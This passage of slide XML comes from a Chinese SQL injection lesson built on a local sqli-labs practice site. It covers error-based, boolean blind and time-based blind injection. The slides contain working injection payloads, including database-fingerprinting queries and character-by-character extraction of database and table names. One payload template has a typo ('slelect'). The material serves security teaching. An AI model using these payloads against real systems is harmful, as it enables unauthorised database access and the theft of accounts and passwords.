                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所在行的数据。</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常见的payload为：'union select 1 from (select count(*),concat((slelect语句),floor(rand(0)*2))x from "一个足大的表" group by x)a--+</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实例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://127.0.0.1/cepo/?id=1' and (select 1 from (select count(*),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>((select version()),floor(rand()*2))x from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> group by x)a) --+</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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13354050" cy="10802957"/>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基于布尔的盲注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ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>布尔盲注，即在页面没有错误回显时完成的注入攻击。此时我们输入的语句让页面呈现出两种不同的状态，相当于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，根据这两种状态可以判断我们输入的语句是否查询成功。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盲注就像是爆破，在进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>盲注时，大致过程为：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，就返回“查询成功”，否则返回“查询失败”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>...</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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，就返回“查询成功”，否则返回“查询失败”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所以，我们构造判断语句，根据页面是否回显证实猜想。一般用到的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ascii() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>length()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exists()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等。</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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{814A635E-1A3F-8616-3640-9211671D22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75" y="3829685"/>
            <a:ext cx="9382125" cy="6056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2" y="2610438"/>
            <a:ext cx="21317668"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）判断数据库类型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and (select count(*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)&gt;0 and 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ACCESE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and (select count(*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>msysobjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)&gt;0 and 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and (select count(*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.TABLES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)&gt;0 and 1=1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and (select count(*) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sys.user_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)&gt;0 and 1=1</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3"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37147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）判断数据库名</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sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>：判断当前数据库的长度，利用二分法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1' and length(database())&gt;5 --+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length(database())&gt;10 --+  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>不显示任何数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1' and length(database())&gt;7 --+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length(database())&gt;8 --+  //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>不显示任何数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>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正常显示，大于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不显示，说明大于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而不大于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，所以可知当前数据库长度为</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个字符</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>：判断当前数据库的字符</a:t>
            </a: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和上面的方法一样，利用二分法依次判断</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判断数据库的第一个字符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(database(),1,1))&gt;115 --+ //100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>表中的十进制，对应字母</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>s</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判断数据库的第二个字符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(database(),2,1))&gt;100 --+</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判断数据库的第三个字符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(database(),3,1))&gt;100 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>...........</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>由此可以判断出当前数据库为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica Light"/>
              </a:rPr>
              <a:t>security</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264285" y="2733573"/>
            <a:ext cx="21855430" cy="923325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t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）猜解数据库表名和列名</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rPr>
              <a:t>：判断当前数据库中表的个数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1' and (select count(</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=database())&gt;3 --+</a:t>
            </a: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：判断每个表的长度</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1‘ and length((select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0,1))&gt;6 --+   </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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>：判断每个表名的每个字符的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>值</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0,1),1,1))&gt;100 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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0,1),2,1))&gt;100 --+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.........</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="825500">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>由此可判断出存在表 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>emails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referers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uagents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</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，猜测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>表中最有可能存在账户和密码，所以以下判断字段和数据在 </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表中判断</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35586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基于时间的盲注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 也叫延时注入。通过观察页面，既没有回显数据库内容，又没有报错信息也没有布尔类型状态，那么我们可以考虑用“绝招”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>延时注入。延时注入就是将页面的响应时间作为判断依据，一点一点注入出数据库的信息。我们以第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关为例，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后面加单引号或者双引号，页面不会发生任何改变，所以我们考虑延时注入。</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延迟注入，是一种盲注的手法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提交对执行时间铭感的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句，通过执行时间的长短来判断是否执行成功，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>正确的话会导致时间很长，错误的话会导致执行时间很短，</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常用函数：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sleep()                //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>睡眠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>暂停</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间为参数给定的秒数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BENCHMARK(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>count,expr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
